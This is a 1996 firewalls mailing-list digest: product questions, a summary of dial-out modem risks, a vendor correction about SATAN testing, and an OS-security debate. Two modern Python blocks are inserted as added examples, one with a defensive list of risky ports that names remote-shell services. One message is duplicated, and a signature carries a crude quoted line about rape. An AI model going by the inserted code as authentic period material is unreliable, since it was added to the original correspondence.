Jesse Gambetti IS Technician jgambetti@radisys.com From firewalls-owner Wed Feb 7 15:10:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA02439 for firewalls-outgoing; Wed, 7 Feb 1996 14:08:40 -0800 (PST) Received: from smtp-gw01.ny.us.ibm.net ([165.87.194.252]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA02434 for ; Wed, 7 Feb 1996 14:08:35 -0800 (PST) From: pcuser@slip67-241.ny.us.ibm.net Received: (from uucp@localhost) by smtp-gw01.ny.us.ibm.net (8.6.9/8.6.9) id WAA65987 for < @smtp-gw01.ny.us.ibm.net:Firewalls@GreatCircle.COM>; Wed, 7 Feb 1996 22:07:43 GMT Message-Id: <199602072207.WAA65987@smtp-gw01.ny.us.ibm.net> Received: from slip67-241.ny.us.ibm.net(129.37.67.241) by smtp-gw01.ny.us.ibm.net via smap (V1.3mjr) id smaNZYDe7; Wed Feb 7 22:07:36 1996 Date: Tue, 6 Feb 96 10:04:23 PST Subject: Firewalls Product Comparison To: @smtp-gw01.ny.us.ibm.net:Firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi guys, I need to prepare a comparative study between Sun's Firewall 1 and IBM NetSP, for the end of this week. Does anyone know where I could find some interesting articles concerning both of these products? Any help would be appreciated. 
Wilmer Caripe EMSCA - ENGINEERING AND MANUFACTURING SYSTEMS CARACAS, VENEZUELA From firewalls-owner Wed Feb 7 15:18:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA02806 for firewalls-outgoing; Wed, 7 Feb 1996 14:15:13 -0800 (PST) Received: from ibmmail.COM (ibmmail.com [199.171.26.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA02801 for ; Wed, 7 Feb 1996 14:15:08 -0800 (PST) Received: from IMXGATE.COM by ibmmail.COM (IBM VM SMTP V2R3) with BSMTP id 6453; Wed, 07 Feb 96 17:14:09 EST Received: from oceanspray.com by imxgate.com (IBM VM SMTP V2R3) with TCP; Wed, 07 Feb 96 17:05:14 EST Received: from OCNSPRAY-Message_Server by oceanspray.com with Novell_GroupWise; Wed, 07 Feb 1996 17:11:18 -0500 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Wed, 07 Feb 1996 17:05:24 -0500 From: LLOYD HARTE To: firewalls@greatcircle.com Subject: RMON Data Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Greetings, This is a little outside of a firewall question but I was wondering if anyone could point me in the direction of where I could find formulas for analyzing RMON data. I want to calculate things like utilization, error rates, etc. I have looked at one tool, Axon LANreporter but it only looks at one day's worth of info and I would like to review, weeks, months, etc. Any assistance would be great! 
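The formulas asked for above, as an added example written for this digest (not Axon LANreporter's code and not part of Lloyd's post). Counter names are those of the RMON MIB etherStats group (RFC 1757); the per-packet and per-octet times are the 10 Mb/s figures the MIB gives for etherHistoryUtilization; the snapshots are constructed, and the 30 s polling interval is an assumption.

```python
"""Utilization and error rate from RMON etherStats snapshots."""
from typing import Dict, List

COUNTER_MAX = 2 ** 32            # etherStats counters are 32-bit Counter objects
PKT_OVERHEAD_US = 9.6 + 6.4      # inter-frame gap + preamble per packet at 10 Mb/s
OCTET_US = 0.8                   # one octet (8 bits) on the wire at 10 Mb/s

ERROR_COUNTERS = ("etherStatsCRCAlignErrors", "etherStatsUndersizePkts",
                  "etherStatsOversizePkts", "etherStatsFragments",
                  "etherStatsJabbers")

def delta(new: int, old: int) -> int:
    """Difference of two cumulative 32-bit counters, surviving one wrap-around."""
    return (new - old) % COUNTER_MAX

def utilization_pct(pkts: int, octets: int, interval_s: float) -> float:
    """Percent of the 10 Mb/s segment's time spent carrying frames, gaps and preambles."""
    busy_us = pkts * PKT_OVERHEAD_US + octets * OCTET_US
    return 100.0 * busy_us / (interval_s * 1_000_000)

def summarize(samples: List[Dict[str, int]], interval_s: float) -> List[Dict[str, float]]:
    """Per-interval utilization, error rate and collisions from consecutive snapshots.

    Polling once per interval and keeping the resulting rows is what lets weeks or
    months be reviewed later: the raw counters are cumulative, only deltas mean anything.
    """
    rows = []
    for prev, cur in zip(samples, samples[1:]):
        pkts = delta(cur["etherStatsPkts"], prev["etherStatsPkts"])
        octets = delta(cur["etherStatsOctets"], prev["etherStatsOctets"])
        errors = sum(delta(cur[k], prev[k]) for k in ERROR_COUNTERS)
        rows.append({
            "utilization_pct": round(utilization_pct(pkts, octets, interval_s), 2),
            "error_rate_pct": round(100.0 * errors / pkts, 3) if pkts else 0.0,
            "collisions": delta(cur["etherStatsCollisions"], prev["etherStatsCollisions"]),
        })
    return rows

# Constructed snapshots 30 s apart; etherStatsOctets wraps between the 2nd and 3rd.
SAMPLE_ETHERSTATS: List[Dict[str, int]] = [
    {"etherStatsPkts": 100_000, "etherStatsOctets": 4_288_960_000,
     "etherStatsCRCAlignErrors": 10, "etherStatsUndersizePkts": 0,
     "etherStatsOversizePkts": 0, "etherStatsFragments": 2,
     "etherStatsJabbers": 0, "etherStatsCollisions": 100},
    {"etherStatsPkts": 110_000, "etherStatsOctets": 4_294_960_000,
     "etherStatsCRCAlignErrors": 15, "etherStatsUndersizePkts": 0,
     "etherStatsOversizePkts": 0, "etherStatsFragments": 2,
     "etherStatsJabbers": 0, "etherStatsCollisions": 120},
    {"etherStatsPkts": 115_000, "etherStatsOctets": 2_992_704,
     "etherStatsCRCAlignErrors": 16, "etherStatsUndersizePkts": 0,
     "etherStatsOversizePkts": 0, "etherStatsFragments": 6,
     "etherStatsJabbers": 0, "etherStatsCollisions": 130},
]

if __name__ == "__main__":
    for row in summarize(SAMPLE_ETHERSTATS, 30.0):
        print(row)
```

The wrap handling is the part a one-day tool gets away without: a 32-bit octet counter on a busy 10 Mb/s segment rolls over in well under an hour, so any multi-week review has to difference modulo 2^32 (and poll often enough that it never wraps twice between samples).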
LHARTE@OCEANSPRAY.COM From firewalls-owner Wed Feb 7 15:32:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA01436 for firewalls-outgoing; Wed, 7 Feb 1996 13:50:16 -0800 (PST) Received: from pfg-bh.principal.com (pfg-bh.principal.com [204.167.169.66]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA01402 for ; Wed, 7 Feb 1996 13:49:52 -0800 (PST) Received: (from uucp@localhost) by pfg-bh.principal.com (8.6.12/8.6.11) id PAA21483 for ; Wed, 7 Feb 1996 15:51:14 -0600 Received: from mailhub1.principal.com(162.131.2.16) by pfg-bh.principal.com via smap (V1.3) id sma021476; Wed Feb 7 15:50:45 1996 Received: from pfgmvs1.principal.com by mailhub1.principal.com; Wed, 7 Feb 96 15:45:54 -0600 Received: from PFGMVS1 by PFGMVS1 (IBM MVS SMTP V3R1) with BSMTP id 0414; Wed, 07 Feb 96 15:48:12 CST Date: Wed, 7 Feb 96 15:47:41 CST To: Cc: "*internet " <*INTERNE%EMC2TNN@PFGMVS1.principal.com> From: "HEROLD.BECKY" Subject: Dial-out risks Message-Id: <31191d936ebc002@mailhub1.principal.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk An important key to the success of a firewall is ensuring employees use it! This can require quite the sales job. In order to get buy-in (hopefully going from top management down through the ranks) it is necessary (in our organization anyway) to explain to people why what they want to do is a bad thing for the corporate network. One of the bad things people will want to do is install modems on PCs that are attached to the WAN and use them for "dial-out only". It is a challenging task to convince them that doing this DOES create a risk, even if they are using a non-DID phone line. (Especially if the WAN has tens of thousands of nodes spread across a geographically huge area.) At the beginning of January I posted a request for information on specific risks in putting modems on PCs that (supposedly) will be used for dial-out access only. 
It is assumed that the PCs are running IP, and may not be going directly to the Internet, but dialing out to other public networks such as AOL, CompuServe, Prodigy, etc.... It is also assumed that the PC may have the full set of Internet services installed, which we've found is the default for many OSs, and which, if it is not the default, can easily be loaded by most people determined they want to use the services. This information will be used in awareness messages and discussions with employees about why, typically, they need to access the Internet through the firewall. I've had some requests to post the responses I received. The following is a summary of the responses, along with some additional information I found after I posted the question. Much thanks to those of you who helped me! Since several of the responses were similar, I'm omitting attributions to them. Please, those of you who are more versed in the technical aspects of these risks than I, let me know any errors you see! Also, please contribute more risks and methods of reducing them that you can think of.

-----------------------------------------------------------------------------

* Since IP is a two-way protocol, someone could gain access to the dial-out PC hard drive (and any networked system) during the dial-out session. This is true even when using the non-DID line (which basically protects against war-dialers in the event the dial-out user leaves the modem on all the time).
* Viruses and trojans can be placed on the dial-out hard drive
* Any files copied to diskettes and placed on the network could cause problems network-wide
* Trojans can collect such goodies as passwords, credit card numbers, etc...anything passing over the network lines
* The dial-out PC could be used as a repository.
* If the person dials-out consistently around the same time each day, or specific days of the week, a hacker can identify when the person is connected and plant the malicious code on the PC or network during those times.
* Since Windows 95, Windows for Workgroups, and other systems have remote communications capabilities built in, it becomes a bigger risk to have dial-out access because of potential macros included in files shared through these systems. It is best to turn these options off when installing the OS.
* FAX systems can be used to transfer files as data rather than images under certain circumstances. A typical use would be to send Word documents with a hole for Word viruses.
* The OS of networked PCs may be screwed up by the mixing and matching of IP stacks and clients that this sort of thing implies. For example, one incarnation of C$'s software unobviously messed with WINSOCK.DLL for one respondent which led to lots of problems trying to debug. The supportability of allowing people to mess with their PC's OS when installing dial-out software/modem needs to be considered.
* IP Spoofing
* Session hijacking
* Users with little PC/systems knowledge installing systems on their dial-out PC that ultimately opens up the entire network (eg., enabling the IP routing feature).
* Dial-out employees allowing non-employees (eg., friends, family, etc.) to use their dial-out machine as a dial-in machine to bounce them to the Internet, resulting once again in opening up the entire network. {I don't have the technical details of how this could be done....does anyone care to share?}
* Denial of service attacks
* Files on the dial-out PC may be copied, deleted, and possibly modified.
* Files may also be copied to, deleted, or modified on the other systems attached to the network.
* Changes may be made to network systems which could prevent access to the network by legitimate users.

If anyone could point to a site with more technical information about these attacks, or provide information to this list, that would be great! Here were the suggestions for dealing with the threats:

* Have strong policy clearly indicating acceptable remote access methods {Definitely agree!}
* Don't allow full network services on the PCs {Great advice...but how? Is there a monitoring device that can determine which PCs are running the services? How are you going to keep 18,000+ people, many of whom are PC-literate enough, from loading the services? Policies are good and necessary, but they are not preventive controls.}
* Educate the employees of the risks so they won't be as likely to do something inadvertently risky. {Absolutely agree! Will definitely help the 80% - 90% of people that want to do the right thing.}
* Scan all PCs for viruses regularly, and downloaded files immediately. {Yes!}
* Check PCs for Trojans regularly. {What's the most efficient way to do this?}
* Encrypt confidential/proprietary data files residing on PCs and attached computer systems. {Getting info on this by subscribing to cypherpunks}
* Use non-DID (outgoing calls only) phone lines to eliminate risks created when people leave their modems on, but are not actively connected.
* Do a network/risk assessment to determine where your weaknesses are.
* Require users to sign a usage policy.
* Require users to pass through an authentication server to dial-out, using a single-use password token.

Thanks, Becky Herold, Sr. Systems Analyst, Information Protection herold.becky@principal.com =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- The opinions expressed here are strictly my own and do not necessarily represent those of my employer. 
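The two open questions in the post above, how to tell which PCs are running network services and what a dial-out PC with IP routing switched on exposes, can be answered from output the PC itself produces. The following is an added example written for this digest, not a product and not part of Becky's post: it parses `netstat -an` text and reports what a dial-up peer could reach. The NT registry value `IPEnableRouter` and the presence of a dial-up adapter are assumed to be read by a collection script and passed in; the sample `netstat` output is constructed, and the port-to-service names are the IANA assignments.

```python
"""What a dial-up peer can reach on a LAN-attached PC, from the PC's own output."""
import re
from typing import Iterable, List, Set, Tuple

# Services a remote peer must not find listening on a LAN-attached dial-out PC.
RISKY_PORTS = {
    21: "ftp", 23: "telnet", 25: "smtp", 69: "tftp", 79: "finger", 111: "sunrpc",
    135: "msrpc", 137: "netbios-ns", 138: "netbios-dgm", 139: "netbios-ssn",
    512: "exec", 513: "login", 514: "shell", 2049: "nfs", 6000: "x11",
}

# One `netstat -an` row: Proto  Local Address  Foreign Address  [State]
_NETSTAT_ROW = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)(?:\s+(\S+))?\s*$", re.I)

def parse_listeners(netstat_text: str) -> Set[Tuple[str, int]]:
    """(proto, port) for every TCP socket in LISTENING state and every bound UDP socket."""
    found: Set[Tuple[str, int]] = set()
    for line in netstat_text.splitlines():
        m = _NETSTAT_ROW.match(line)
        if not m:
            continue                                  # banner, header or blank line
        proto, _local, port, _foreign, state = m.groups()
        proto = proto.upper()
        if proto == "TCP" and (state or "").upper() != "LISTENING":
            continue                                  # ESTABLISHED/TIME_WAIT rows are not services
        found.add((proto, int(port)))
    return found

def audit_dialout_pc(netstat_text: str, dialup_adapter: bool, ip_enable_router: int,
                     allowed_ports: Iterable[int] = ()) -> List[str]:
    """Findings for one PC; an empty list means nothing is exposed over the modem."""
    findings: List[str] = []
    if not dialup_adapter:
        return findings                               # no modem link, no remote peer
    if ip_enable_router:
        findings.append("IPEnableRouter=1: PC forwards packets between the dial-up link and the LAN")
    allowed = set(allowed_ports)
    for proto, port in sorted(parse_listeners(netstat_text)):
        if port in allowed:
            continue
        name = RISKY_PORTS.get(port)
        if name:
            findings.append(f"{proto}/{port} ({name}) is listening and reachable from the dial-up peer")
        else:
            findings.append(f"{proto}/{port} is listening (unrecognised service); confirm it is needed")
    return findings

# Constructed `netstat -an` output: file sharing and telnet bound on all interfaces.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:23             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:139            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1030           0.0.0.0:0              LISTENING
  TCP    192.168.10.7:1041      10.11.12.13:80         ESTABLISHED
  UDP    0.0.0.0:137            *:*
  UDP    0.0.0.0:138            *:*
"""

if __name__ == "__main__":
    for finding in audit_dialout_pc(SAMPLE_NETSTAT, dialup_adapter=True, ip_enable_router=1):
        print("FINDING:", finding)
```

Run per PC, the output is the preventive control the post says policy alone is not: a host that binds a service to 0.0.0.0 offers it on the dial-up interface as well as the LAN one, and a host with forwarding enabled turns the modem into a second route into the WAN. Anything in the findings list is a reason to remove the service, bind it to the LAN address only, or take the modem away.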
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From firewalls-owner Wed Feb 7 15:38:52 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA02199 for firewalls-outgoing; Wed, 7 Feb 1996 14:03:47 -0800 (PST) Received: from gaia.aoainc.com (gaia.aoainc.com [199.93.216.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA02189 for ; Wed, 7 Feb 1996 14:03:35 -0800 (PST) Received: (from uucp@localhost) by gaia.aoainc.com (8.6.12/8.6.9) id RAA21988; Wed, 7 Feb 1996 17:02:43 -0500 Received: from aoa.aoainc.com(199.93.217.20) by gaia.aoainc.com via smap (V1.3) id sma021985; Wed Feb 7 17:02:21 1996 Received: from albedo.aoainc.com. (albedo.aoainc.com [199.93.217.155]) by aoa.aoainc.com (8.6.9/8.6.9) with SMTP id RAA27113; Wed, 7 Feb 1996 17:02:20 -0500 Message-ID: Date: Wed, 7 Feb 96 17:01:04 -0400 From: "Richard L. Snow" Subject: Re: firewalls, email, and dns To: "Lehrer, Neil" , firewalls@GreatCircle.COM X-Mailer: VersaTerm Link v1.1.1 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >hi, > >our smtp mail server is an smtp/mhs gateway that runs on DOS. since it >does not have the traditional sendmail vulnerabilities can I/should I >allow smtp traffic through a firewall [] Well, it's pretty easy to use a mail forwarder such as SMAP in the TIS firewalls toolkit. If your firewall is unix you can replace the sendmail daemon with this program which is short enough that you could actually figure out what the code is doing. The traditional argument is that if the program is complex enough that you can't tell what its behavior will be, then there is a high risk there is a hole in there which you don't know about. -Rich Rich Snow rich@aoainc.com (617)864-0201 -----------------------------------------------* Adaptive Optics Associates, Inc. 54 Cambridgepark Dr., Cambridge, MA. 
02140 From firewalls-owner Wed Feb 7 15:47:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA02198 for firewalls-outgoing; Wed, 7 Feb 1996 14:03:45 -0800 (PST) Received: from grendel.texas.net (grendel.texas.net [204.96.23.204]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA02188 for ; Wed, 7 Feb 1996 14:03:35 -0800 (PST) Received: (from stend@localhost) by grendel.texas.net (8.6.10/8.6.9) id PAA09076; Wed, 7 Feb 1996 15:25:08 -0600 Date: Wed, 7 Feb 1996 15:25:08 -0600 From: Sten Drescher Message-Id: <199602072125.PAA09076@grendel.texas.net> To: "Kenneth J. Stephens" CC: goertzek@wangfed.com, firewalls@GreatCircle.COM In-reply-to: "Kenneth J. Stephens"'s message of Tue, 6 Feb 1996 10:40:05 -0500 (EDT) Subject: Re: Survey References: <199602061540.KAA18136@Fe3.rust.net> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk "Kenneth J. Stephens" said: KJS> If the magazine publishers forced the issue date onto all of KJS> their reprints the vendors would have little use for the KJS> reprints. The date stamp would obsolete the reprint so quickly KJS> that the vendor would look foolish for distributing old info. KJS> One of the hazards of a dynamic industry. Given the number of computer manufacturers which clearly include the DATE of the publication in which their products were selected a Best Buy/Editors Choice/etc., this is ludicrous. Personally, if I were to receive an undated reprint of a magazine review as part of a product's promotional literature, my most favorable reaction would be to place it in the circular file, with my most probable being wondering why they don't want me to know how old the review is. OTOH, if I received reprints dated, say, June 1994, May 1995, and September 1995, that would show me that not only does this company develop a good product, but that they maintain a good product, which, to me, is extremely important. 
-- #include /* Sten Drescher */ Unsolicited email advertisements will be proofread for a US$100/page fee. CDA Bait: Look, I have two daughters who haven't been laid yet. How about you rape them right here, instead of my guests? Gen 19:8 From firewalls-owner Wed Feb 7 15:51:57 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA02485 for firewalls-outgoing; Wed, 7 Feb 1996 14:09:10 -0800 (PST) Received: from icicle.winternet.com (icicle.winternet.com [198.174.169.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA02442 for ; Wed, 7 Feb 1996 14:08:55 -0800 (PST) Received: from parka (dufresne@parka.winternet.com [198.174.169.9]) by icicle.winternet.com (8.7.3/8.7.2) with ESMTP id QAA10210; Wed, 7 Feb 1996 16:07:40 -0600 (CST) Received: (from dufresne@localhost) by parka (8.6.12/8.6.12) id QAA03253; Wed, 7 Feb 1996 16:07:39 -0600 Posted-Date: Wed, 7 Feb 1996 16:07:39 -0600 Date: Wed, 7 Feb 1996 16:07:38 -0600 (CST) From: Ron DuFresne To: Chris Jenkins cc: winnt-l@eva.dc.lsoft.com, jeromie@garrison.com, firewalls@GreatCircle.COM, SATEESHB@inf.com Subject: Re: NT's TCP/IP stack + NetManage NEWT conflict. -Reply In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 7 Feb 1996, Chris Jenkins wrote: > all of the newest (and even WFW311) come with a free TCPIP stack. > Third party applications like Chameleon, LanWorkPlace, etc....come with > their own stacks. In most cases, you should be able to get applications > (Telnet, FTP, mail, etc) from one third-party product to work over anothers > TCP/IP stack. This is where the WINSOCK standard comes in. > > More specialized TCP/IP functions running on Windows (such as XServer, > 3270, etc) may require a stack/Winsock specific to that particular product. > > Since MS gives you TCP/IP and WINSOCK, most third party applications > should be able to run. 
If I recall correctly, I think that some of Chameleons > applications will run on MS tcp/ip stack. Yes, this is true, but you don't want to run newt with the other stack active. At one site we worked with we found wfw311 and newt in continual conflict. When just running newt, a version prior to 5.0 <3.5-4.0 I think we ran> it was very unstable. We weren't very impressed and ended up tossing newt to the sidelines. Later, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From firewalls-owner Wed Feb 7 16:07:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA05145 for firewalls-outgoing; Wed, 7 Feb 1996 14:46:20 -0800 (PST) Received: from usia.gov (XGATE.USIA.GOV [198.67.64.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA05132 for ; Wed, 7 Feb 1996 14:46:15 -0800 (PST) Received: from NetWare MHS (SMF70) by usia.gov via Connect2-SMTP 4.00; Wed, 7 Feb 96 17:45:57 -0500 Message-ID: <2C1D19310136C8D1@usia.gov> Date: Wed, 7 Feb 96 17:44:07 -0500 From: "Lehrer, Neil" Organization: USIA To: firewalls@greatcircle.com Subject: fw-1 and smapd X-mailer: Connect2-SMTP 4.00 MHS to SMTP Gateway Sender: firewalls-owner@GreatCircle.COM Precedence: bulk hi, are any of you firewall-1 customers putting smap on your firewall as the mail redirector? any other way to do this? i didn't see anything in the fw-1 manual other than having a rule that lets outside email go through the wall to your inside mail server and trust that? cc to my email address would be great. thanks. Regards +++++++++++++++++++++++++++++++++++++++ + Neil Lehrer + U.S. 
Information Agency + Networks and Systems Support Division + + voice 202 619-0903 + fax 202 619-3883 + internet nlehrer@usia.gov + + "oh what a tangled net we weave + when we seek to retrieve." + +++++++++++++++++++++++++++++++++++++++ From firewalls-owner Wed Feb 7 16:09:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA06460 for firewalls-outgoing; Wed, 7 Feb 1996 15:07:44 -0800 (PST) Received: from mail.ganton-mcr.com (mail.ganton-mcr.com [206.233.102.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA06448 for ; Wed, 7 Feb 1996 15:07:36 -0800 (PST) Received: from kia.mazama.com (sfsp95.slip.net [204.160.88.159]) by mail.ganton-mcr.com (8.6.11/8.6.9) with SMTP id PAA26783; Wed, 7 Feb 1996 15:12:36 -0800 Date: Wed, 7 Feb 1996 15:05:27 -0800 (PST) From: Larry Stelmat To: firewalls@greatcircle.com cc: info@mazama.com Subject: Re: Mazama Packet Filter: Misleading advertising In-Reply-To: <311763D4.3843@csc.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We'd like to thank Darren Reed for pointing out a poorly worded segment of our old product description. Our intent was to communicate that we had run Satan on several MPF installations and that MPF, properly configured, managed to detect and stop most of the attacks that SATAN attempts to use. The history was that earlier information did not mention SATAN, and we got frequent e-mail asking us if we had tested MPF with SATAN. So around summer we started mentioning SATAN in later sales information. After being revised four times or more by three different people, the original intent and statement was more than a bit mangled. It is true that the current version of MPF does detect hosts that are scanning port space or address space. At MSL, our primary mission is to build a better product at a lower price. Unfortunately we have a limited number of resources. 
Our primary resources go into development and testing of MPF with
marketing trailing as dead last. The result of which is our product is
well tested (including documentation), but our sales material is crafted
quickly and without much time for review.

We again want to thank Darren for pointing out our problem. The efforts to
ensure that published information is accurate makes the Internet a great
place to do business.

David Bonn, President
Mazama Software Labs
david@mazama.com

>
> The following appears on one of their web pages:
> (http://www.mazama.com/mpf12desc.html):
> ...
> TECHNICAL SECURITY FEATURE LIST
>
>
> _________________________________________________________________
>
>
>
>
>      * Blocking of all services which are not explicitly enabled.
>      * Blocking of ICMP Redirect Packets.
>      * Blocking of IP Source Route options.
>      * Blocking of Spoofed IP addresses.
>      * Blocking of Spoofed IP fragments.
>      * Dangerous services such as rsh/rlogin, X window, Openwindows,
>        NFS, and other RPC services are blocked by default.
>      * TCP Services use SYN/ACK checking to verify the direction of all
>        TCP connections.
>      * We have used SATAN to analyze MPF installations and verified that
>        the above security problems are solved by MPF. The current version
>        of MPF can detect port scans from SATAN and automatically block
>        all packets from a host running SATAN.
> ...
>
> The last item is what I would draw your attention to.
>
> SATAN does *NOT* test all of the above. In fact, it only does the first.
> Well, to be pedantic, it doesn't look for blocked services, but scans
> looking for services which are active and are possible avenues for a
> breakin. That is unless they developed their own plug-in tests for SATAN,
> which their web page doesn't brag about, so I'll assume to not be the case
> O:).
>
> Maybe they assumed that their DHB (Dynamic Host Blocking) solved
> everything when it blocks out an entire host when it notices a SATAN
> style attack.
>
> Now, if they had mentioned ISS, I might take it more seriously and assume
> that maybe 3 or more of the above had been checked...
>
> IMHO, that particular page stinks...(you can find other rich comments
> there, too...)...probably from Marcus's dead chicken that they waved
> around and dropped there ;)
>
> darren
>
> (p.s. chris, if you get an order from a certain company, you owe me one
> ;-)
>

From firewalls-owner Wed Feb 7 16:12:23 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA04597 for firewalls-outgoing; Wed, 7 Feb 1996 14:38:34 -0800 (PST)
Received: from grendel.texas.net (grendel.texas.net [204.96.23.204]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA04547 for ; Wed, 7 Feb 1996 14:38:10 -0800 (PST)
Received: (from stend@localhost) by grendel.texas.net (8.6.10/8.6.9) id PAA09076; Wed, 7 Feb 1996 15:25:08 -0600
Date: Wed, 7 Feb 1996 15:25:08 -0600
From: Sten Drescher
Message-Id: <199602072125.PAA09076@grendel.texas.net>
To: "Kenneth J. Stephens"
CC: goertzek@wangfed.com, firewalls@GreatCircle.COM
In-reply-to: "Kenneth J. Stephens"'s message of Tue, 6 Feb 1996 10:40:05 -0500 (EDT)
Subject: Re: Survey
References: <199602061540.KAA18136@Fe3.rust.net>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

"Kenneth J. Stephens" said:

KJS> If the magazine publishers forced the issue date onto all of
KJS> their reprints the vendors would have little use for the
KJS> reprints. The date stamp would obsolete the reprint so quickly
KJS> that the vendor would look foolish for distributing old info.
KJS> One of the hazards of a dynamic industry.

Given the number of computer manufacturers which clearly include the DATE
of the publication in which their products were selected a Best
Buy/Editors Choice/etc., this is ludicrous.
Personally, if I were to receive an undated reprint of a magazine review
as part of a product's promotional literature, my most favorable reaction
would be to place it in the circular file, with my most probable being
wondering why they don't want me to know how old the review is. OTOH, if
I received reprints dated, say, June 1994, May 1995, and September 1995,
that would show me that not only does this company develop a good
product, but that they maintain a good product, which, to me, is
extremely important.

--
#include /* Sten Drescher */
Unsolicited email advertisements will be proofread for a US$100/page fee.
CDA Bait: Look, I have two daughters who haven't been laid yet. How about
you rape them right here, instead of my guests? Gen 19:8

From firewalls-owner Wed Feb 7 16:30:23 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA08730 for firewalls-outgoing; Wed, 7 Feb 1996 15:44:24 -0800 (PST)
Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA08717 for ; Wed, 7 Feb 1996 15:44:17 -0800 (PST)
Received: from tsgops.rtp.dg.com by dg-rtp.dg.com (5.4R3.10/dg-rtp-v02) id AA27728; Wed, 7 Feb 1996 18:43:26 -0500
Received: by tsgops.rtp.dg.com (5.4R3.10/200.8.1.3) id AA05372; Wed, 7 Feb 1996 18:43:22 -0500
From: spencerj@dg-rtp.dg.com (Jon Spencer)
Message-Id: <9602072343.AA05372@tsgops.rtp.dg.com>
Subject: Re: Most Secure Unix?
To: weber@iez.com (Rolf Weber)
Date: Wed, 7 Feb 1996 18:43:21 -0500 (EST)
Cc: spencerj@dg-rtp.dg.com, firewalls@greatcircle.com
In-Reply-To: <9601311230.AA16241@spibm02> from "Rolf Weber" at Jan 31, 96 01:30:08 pm
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

...
> > So, if a firewall that only protects you against outsiders works perfectly,
> > you might reduce your risk by 10%.
> > Won't you feel nice and warm and fuzzy!?
>
> yes, i feel :-)
> if the firewall is properly configured, even insiders can't break the
> firewall's security.

I think perhaps my point wasn't made clearly. The firewall can only be as
good as the OS on which it exists. If your firewall is an application on
top of an OS, I can break the firewall by breaking the OS.

> >
> > Another problem with firewalls being an application is that the firewall
> > then does not really provide much protection for WWW sites. Since you
> > can't trust the WWW software to run on the firewall (because you can't
> > trust the OS), you must either put the WWW server inside of or outside of
> > the firewall. If it is outside, then there is no protection for the WWW
> > server (and I am certain that we all know of the home pages that have been
> > altered by hackers). If the WWW server is on the inside, then you must
> > open a hole for anonymous users in the firewall, thus greatly reducing or
> > eliminating any security it might have afforded you.
>
> how could a firewall protect a WWW server? impossible!
> the only 'secure' solution is to place it outside and insure this host as
> good as possible.

Well, "impossible" is a very big word to use! Especially, since this is
exactly what we have. If your assumption is that the firewall is an
application, then I do agree with you. That is why the functions of a
firewall need to be a base component of a high assurance OS (so you know
that they work). Then you run the WWW server on that OS, and you
(apparently) have the impossible. :-)

> >
> > Bottom line is that the firewall is COMPLETELY dependent upon the security
> > provided by the OS for its own security - The firewall can be no more
> > secure. If I can break into the OS, the firewall is mine to mangle. More
> > on this below.
> >
> > [snip]
> >
> > Jon F. Spencer spencerj@rtp.dg.com (uunet!rtp.dg.com!spencerj)
> > Data General Corp.                     Phone : (919)248-6246
> > 62 T.W. Alexander Dr, MS #119          FAX   : (919)248-6108
> > Research Triangle Park, NC 27709       Office RTP 121/9
>
> on a typical firewall, there only runs:
> -the kernel, i never heard of any breakin with the help of a kernel bug
